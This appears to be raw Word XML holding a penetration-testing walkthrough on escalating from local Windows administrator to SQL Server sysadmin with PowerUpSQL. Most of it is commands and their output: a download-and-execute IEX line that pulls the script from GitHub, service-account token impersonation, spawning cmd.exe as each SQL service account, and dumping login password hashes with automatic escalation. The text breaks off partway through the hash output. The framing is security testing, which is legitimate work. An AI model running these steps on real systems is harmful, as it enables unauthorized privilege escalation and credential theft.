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FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>#1).DBMS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRPr="007561B1" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007561B1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="003F7D58">
        <w:t>Regardless of a SQL Server service account’s privileges on the operating system, it has sysadmin privileges in SQL Server by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="422E779D" wp14:editId="0BAFACBD">
            <wp:extent cx="5274310" cy="2698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274F2" wp14:editId="40CD6126">
            <wp:extent cx="5274310" cy="2569845"/>
            <wp:effectExtent l="0" t="0" r="254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C7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="003F7D58">
        <w:t xml:space="preserve"> few handy functions for impersonating the SQL Server service account with PowerUpSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00DE0258">
        <w:t>Invoke-SQLImpersonateService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00DE0258">
        <w:t>Invoke-SQLImpersonateService can be used to impersonate a SQL Server service account based on an instance name.  This can come in handy when you’re a local admin on a box and want to be able to run all the PowerUpSQL functions as a sysadmin against a local SQL Server instance. Below is a basic example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Log into the target system as a local or domain administrator. Then verify who you are.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>demo\administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Next load the PowerShell module PowerUpSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerU</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pSQL/master/PowerUpSQL.ps1")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>List the first available SQL Server instance on the local system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Get-SQLInstanceLocal | Select-Object -First 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ComputerName       : MSSQLSRV04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Instance           : MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceDisplayName : SQL Server (BOSCHSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceName        : MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL12.BOSCHSQL\MSSQL\Binn\sqlservr.exe" -sBOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceAccount     : NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>State              : Running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2214C4C0" wp14:editId="11CCBA57">
            <wp:extent cx="5274310" cy="282194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C7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Verify that the local administrator does not have sysadmin privileges on the local SQL Server instance using the Get-SQLServerInfo function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ComputerName           : MSSQLSRV04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Instance               : MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>DomainName             : DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceProcessID       : 1620</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceName            : MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceAccount         : NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>AuthenticationMode     : Windows and SQL Server Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Clustered              : No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerVersionNumber : 12.0.4100.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerMajorVersion  : 2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerEdition       : Developer Edition (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerServicePack   : SP1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OSArchitecture         : X64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>OsVersionNumber        : 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Currentlogin           : DEMO\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>IsSysadmin             : No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ActiveSessions         : 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>You should notice that the “CurrentLogin” is your current user account, and “IsSysadmin” is “No”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7615651B" wp14:editId="2DD4C448">
            <wp:extent cx="5274310" cy="284099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C7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Impersonate the SQL Server service account for the target instance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Invoke-SQLImpersonateService -Verbose -Instance MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : DEMO\administrator has local admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Impersonating SQL Server process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : - Process ID: 1620</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : - Service Account: NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Selecting token by Process object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567AC137" wp14:editId="3E534AA0">
            <wp:extent cx="5274310" cy="15881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C7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00343479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Verify that the SQL Server service account for the target instance was successful by running the Get-SQLServerInfo command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PS C:\&gt; Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ComputerName           : MSSQLSRV04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Instance               : MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>DomainName             : DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceProcessID       : 1620</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceName            : MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ServiceAccount         : NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>AuthenticationMode     : Windows and SQL Server Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Clustered              : No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerVersionNumber : 12.0.4100.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerMajorVersion  : 2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerEdition       : Developer Edition (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>SQLServerServicePack   : SP1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>OSArchitecture         : X64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>OsMachineType          : ServerNT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>OSVersionName          : Windows Server 2012 Standard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>OsVersionNumber        : 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>CurrentLogin           : NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>IsSysadmin             : Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ActiveSessions         : 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00343479">
        <w:t>the “CurrentLogin” is now the SQL Server service account, and “IsSysadmin” is now “Yes”.  At this point, any PowerUpSQL function you run will be in a sysadmin context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00343479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Once you’re all done doing what you need to do, revert to your original user context with the command below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Invoke-SQLImpersonateService -Verbose -Rev2Self</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Invoke-SQLImpersonateServiceCmd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Below is an example showing how to quickly start a cmd.exe in the context of each SQL service account associated with the instance MSSQLSRV04\BOSCHSQL.  It’s a little silly, but it seems to be an effective way to illustrate risk around SQL Server service accounts during demos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00FD5887">
        <w:t>Note: You can also set a custom command to run using the -Exec command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Invoke-SQLImpersonateServiceCmd -Instance MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRPr="00FD5887" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Note: The verbose flag will give you more info if you need it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>MSSQLSRV04\BOSCHSQL - Service: SQL Full-text Filter Daemon Launcher (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSSQLFDLauncher$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>MSSQLSRV04\BOSCHSQL - Service: SQL Server Reporting Services (BOSCHSQL) - Running command "cmd.exe" as NT Service\ReportServer$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>MSSQLSRV04\BOSCHSQL - Service: SQL Server Analysis Services (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSOLAP$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>MSSQLSRV04\BOSCHSQL - Service: SQL Server (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>All done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00AA1CB4">
        <w:t>When the function is done running you should have a cmd.exe window for each of the services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C62A854" wp14:editId="0FE06DF1">
            <wp:extent cx="5274310" cy="551434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C7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00FD5887">
        <w:t>Get-SQLServerPasswordHash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00FD5887">
        <w:t>Mike Manzotti (@mmanzo_) was nice enough to write a great function for pulling SQL Server login password hashes. It can be quite handy during penetration tests when searching for commonly shared account passwords.  He also added a -migrate switch to automatically escalate to sysadmin if your executing against a local instance with local administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PS C:\&gt; Get-SQLServerPasswordHash -Verbose -Instance MSSQLSRV04\BOSCHSQL -Migrate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : DEMO\administrator has local admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Impersonating SQL Server process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : - Process ID: 1568</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : - ServiceAccount: NT Service\MSSQL$BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Selecting token by Process object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Attempting to dump password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: MSSQLSRV04\BOSCHSQL : Attempt complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>VERBOSE: 3 password hashes recovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>ComputerName        : MSSQLSRV04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Instance            : MSSQLSRV04\BOSCHSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PrincipalId         : 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PrincipalName       : sa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PrincipalSid        : 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>PrincipalType       : SQL_LOGIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>CreateDate          : 4/8/2003 9:10:35 AM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>DefaultDatabaseName : master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
